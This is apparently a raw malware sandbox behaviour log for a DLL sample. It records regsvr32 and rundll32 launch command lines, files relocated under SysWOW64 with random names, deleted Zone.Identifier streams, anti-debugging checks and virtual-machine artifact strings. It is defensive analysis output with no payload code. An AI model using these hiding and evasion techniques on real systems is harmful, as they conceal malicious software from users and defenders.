                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6472
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4308:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4752:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6864:64:WilError_01
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100126F9 FindResourceA,LoadResource,LockResource,FreeResource,2_2_100126F9
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Binary string: iphlpapi.pdb7 source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdbM source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.267840034.0000000004F77000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292394761.0000000002B65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292304746.0000000004489000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293332674.0000000002B65000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.281739906.00000000030A2000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.272409759.0000000005405000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293551321.0000000002B5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292377523.0000000002B5F000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000E.00000003.272409759.0000000005405000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb/ source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb_ source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297271185.00000000048A5000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292410735.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293341268.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293486034.0000000002B6B000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.292410735.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293341268.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293486034.0000000002B6B000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.292394761.0000000002B65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293332674.0000000002B65000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb) source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297271185.00000000048A5000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.293551321.0000000002B5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292377523.0000000002B5F000.00000004.00000001.sdmp
                      Source: xxWrY2YG7s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: xxWrY2YG7s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: xxWrY2YG7s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: xxWrY2YG7s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: xxWrY2YG7s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F51195 push cs; iretd 0_2_02F51197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10019891 push ecx; ret 2_2_100198A4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10017C60 push ecx; ret 2_2_10017C73
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E61195 push cs; iretd 2_2_00E61197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10019891 push ecx; ret 3_2_100198A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10017C60 push ecx; ret 3_2_10017C73
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04741195 push cs; iretd 3_2_04741197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C21195 push cs; iretd 7_2_00C21197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C31195 push cs; iretd 11_2_04C31197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_10023A79
                      Source: xxWrY2YG7s.dllStatic PE information: real checksum: 0x66354 should be: 0x6c52b
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xxWrY2YG7s.dll
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zyaJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ynbglcmtebwefkh\kybokpdcd.avl:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,2_2_1000D804
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_10008B90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,3_2_1000D804
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_10008B90
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 6792Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6788Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6636Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 4.9 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.9 %
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-21607
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21798
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.14.drBinary or memory string: VMware
                      Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 00000028.00000002.586729756.000002014FE82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.14.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: svchost.exe, 00000009.00000002.603466856.0000019B31257000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.603484817.0000019B31264000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000002.776922125.0000000002E84000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000003.301202943.0000000002EAB000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000002.777016597.0000000002EAC000.00000004.00000020.sdmp, WerFault.exe, 00000014.00000002.314476221.000000000445E000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.312086164.0000000004470000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.312035662.000000000445C000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.586755929.000002014FE8A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.586862467.000002014FEEA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.603029312.0000019B2BC29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@p&1
                      Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: svchost.exe, 00000010.00000002.774690814.00000214CF267000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.773899188.000001BBF9E29000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.310546250.0000000004487000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001C49A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_10023A79
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100178B6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5F7F7 mov eax, dword ptr fs:[00000030h]0_2_02F5F7F7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6F7F7 mov eax, dword ptr fs:[00000030h]2_2_00E6F7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474F7F7 mov eax, dword ptr fs:[00000030h]3_2_0474F7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00C2F7F7 mov eax, dword ptr fs:[00000030h]7_2_00C2F7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04C3F7F7 mov eax, dword ptr fs:[00000030h]11_2_04C3F7F7
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5C6B8 LdrInitializeThunk,0_2_02F5C6B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001C49A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10021743
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_100167D5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,2_2_1001FC21
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,2_2_1001FC43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1001C49A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10021743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_100167D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,3_2_1001FC21
